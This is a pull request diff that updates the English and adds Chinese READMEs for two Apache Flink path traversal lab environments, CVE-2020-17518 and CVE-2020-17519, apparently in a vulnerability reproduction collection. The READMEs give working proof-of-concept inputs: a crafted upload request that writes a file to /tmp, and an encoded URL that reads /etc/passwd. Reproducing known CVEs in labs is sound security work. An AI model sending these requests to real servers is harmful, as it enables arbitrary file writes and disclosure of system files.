### PR TITLE
Update Apache Flink documentation

### DIFF
--- a/environments.toml
+++ b/environments.toml
@@ -407,7 +407,7 @@ app = "Jinja2"
 path = "flask/ssti"
 
 [[environment]]
-name = "Apache Flink File Upload"
+name = "Apache Flink Upload Path Traversal"
 cve = ["CVE-2020-17518"]
 app = "Apache Flink"
 path = "flink/CVE-2020-17518"

--- a/environments.toml
+++ b/environments.toml
@@ -413,7 +413,7 @@ app = "Apache Flink"
 path = "flink/CVE-2020-17518"
 
 [[environment]]
-name = "Apache Flink Jobmanager/Logs Directory Traversal"
+name = "Apache Flink `jobmanager/logs` Path Traversal"
 cve = ["CVE-2020-17519"]
 app = "Apache Flink"
 path = "flink/CVE-2020-17519"

--- a/flink/CVE-2020-17518/README.md
+++ b/flink/CVE-2020-17518/README.md
@@ -1,27 +1,29 @@
 # Apache Flink Upload Path Traversal (CVE-2020-17518)
 
+[中文版本(Chinese version)](README.zh-cn.md)
+
 Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.
 
-Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER.
+A vulnerability in Apache Flink 1.5.1 and later versions allows attackers to write uploaded files to arbitrary locations on the local file system through a maliciously crafted HTTP header in the REST API request. This issue is fixed in Apache Flink 1.11.3.
 
 References:
 
-- https://github.com/apache/flink/commit/a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4
-- https://nvd.nist.gov/vuln/detail/CVE-2020-17518
+- <https://github.com/apache/flink/commit/a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4>
+- <https://nvd.nist.gov/vuln/detail/CVE-2020-17518>
 
 ## Environment Setup
 
-Execute following commands to start a Apache Flink jobmanager 1.11.2:
+Execute the following command to start an Apache Flink jobmanager 1.11.2:
 
 ```
 docker compose up -d
 ```
 
-After the Apache Flink is started, visit `http://your-ip:8081` to view the homepage.
+After the Apache Flink service is started, visit `http://your-ip:8081` to access the management interface.
 
-## Exploit
+## Vulnerability Reproduction
 
-Use following request to upload a file to `/tmp/success`:
+Send the following HTTP request to upload a file to `/tmp/success` on the target server:
 
 ```
 POST /jars/upload HTTP/1.1
@@ -39,7 +41,8 @@ Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/
 
 success
 ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
-
 ```
+
+After the file is uploaded, you can check the `/tmp/success` file on the target server:
 
 ![](1.png)

--- a/flink/CVE-2020-17518/README.zh-cn.md
+++ b/flink/CVE-2020-17518/README.zh-cn.md
@@ -1,0 +1,46 @@
+# Apache Flink 上传路径穿越漏洞（CVE-2020-17518）
+
+Apache Flink 是一个开源的分布式流处理和批处理大数据计算引擎。
+
+Apache Flink 1.5.1 版本引入了一个 REST handler，攻击者可以通过恶意修改 HTTP HEADER，实现将上传的文件写入到本地文件系统的任意位置。该问题在 Apache Flink 1.11.3 版本中得到修复。
+
+参考链接：
+
+- <https://github.com/apache/flink/commit/a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4>
+- <https://nvd.nist.gov/vuln/detail/CVE-2020-17518>
+
+## 环境搭建
+
+执行如下命令启动一个 Apache Flink jobmanager 1.11.2：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8081` 即可查看到 Apache Flink 的管理页面。
+
+## 漏洞复现
+
+发送如下数据包，即可上传一个文件到目标服务器的 `/tmp/success` 位置：
+
+```
+POST /jars/upload HTTP/1.1
+Host: localhost:8081
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
+Content-Length: 187
+
+------WebKitFormBoundaryoZ8meKnrrso89R6Y
+Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
+
+success
+------WebKitFormBoundaryoZ8meKnrrso89R6Y--
+```
+
+上传成功后，即可在目标服务器上查看到 `/tmp/success` 文件：
+
+![](1.png)

--- a/flink/CVE-2020-17518/docker-compose.yml
+++ b/flink/CVE-2020-17518/docker-compose.yml
@@ -1,4 +1,3 @@
-version: '2'
 services:
  flink:
    image: vulhub/flink:1.11.2

--- a/flink/CVE-2020-17519/README.md
+++ b/flink/CVE-2020-17519/README.md
@@ -1,30 +1,32 @@
 # Apache Flink `jobmanager/logs` Path Traversal (CVE-2020-17519)
 
+[中文版本(Chinese version)](README.zh-cn.md)
+
 Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.
 
-A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
+A vulnerability introduced in Apache Flink 1.11.0 (and present in versions 1.11.1 and 1.11.2) allows attackers to read arbitrary files from the local filesystem through the JobManager's REST interface. This path traversal vulnerability exists in the log viewing functionality.
 
 References:
 
-- https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801
-- https://nvd.nist.gov/vuln/detail/CVE-2020-17519
+- <https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801>
+- <https://nvd.nist.gov/vuln/detail/CVE-2020-17519>
 
 ## Environment Setup
 
-Execute following commands to start a Apache Flink jobmanager 1.11.2:
+Execute the following command to start an Apache Flink jobmanager 1.11.2:
 
 ```
 docker compose up -d
 ```
 
-After the Apache Flink is started, visit `http://your-ip:8081` to view the homepage.
+After the Apache Flink service is started, visit `http://your-ip:8081` to access the management interface.
 
-## Exploit
+## Vulnerability Reproduction
 
-Disclose the `/etc/passwd`:
+Access the following URL to read the contents of `/etc/passwd` file from the target server:
 
 ```
-http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
+http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
 ```
 
 ![](1.png)

--- a/flink/CVE-2020-17519/README.zh-cn.md
+++ b/flink/CVE-2020-17519/README.zh-cn.md
@@ -1,0 +1,30 @@
+# Apache Flink `jobmanager/logs` 路径穿越漏洞（CVE-2020-17519）
+
+Apache Flink 是一个开源的分布式流处理和批处理大数据计算引擎。
+
+Apache Flink 1.11.0 版本中引入的一个更改（同时也存在于 1.11.1 和 1.11.2 版本中）允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任意文件。
+
+参考链接：
+
+- <https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801>
+- <https://nvd.nist.gov/vuln/detail/CVE-2020-17519>
+
+## 环境搭建
+
+执行如下命令启动一个 Apache Flink jobmanager 1.11.2：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8081` 即可查看到 Apache Flink 的管理页面。
+
+## 漏洞复现
+
+通过以下 URL 可以读取服务器上的 `/etc/passwd` 文件内容：
+
+```
+http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
+```
+
+![](1.png)

--- a/flink/CVE-2020-17519/docker-compose.yml
+++ b/flink/CVE-2020-17519/docker-compose.yml
@@ -1,4 +1,3 @@
-version: '2'
 services:
  flink:
    image: vulhub/flink:1.11.2


### PR DESCRIPTION
- Rename environment in environments.toml to clarify vulnerability type
- Remove Docker Compose version specification
- Translate README to English
- Add Chinese version README (README.zh-cn.md)
- Enhance documentation with detailed technical explanation of path traversal vulnerability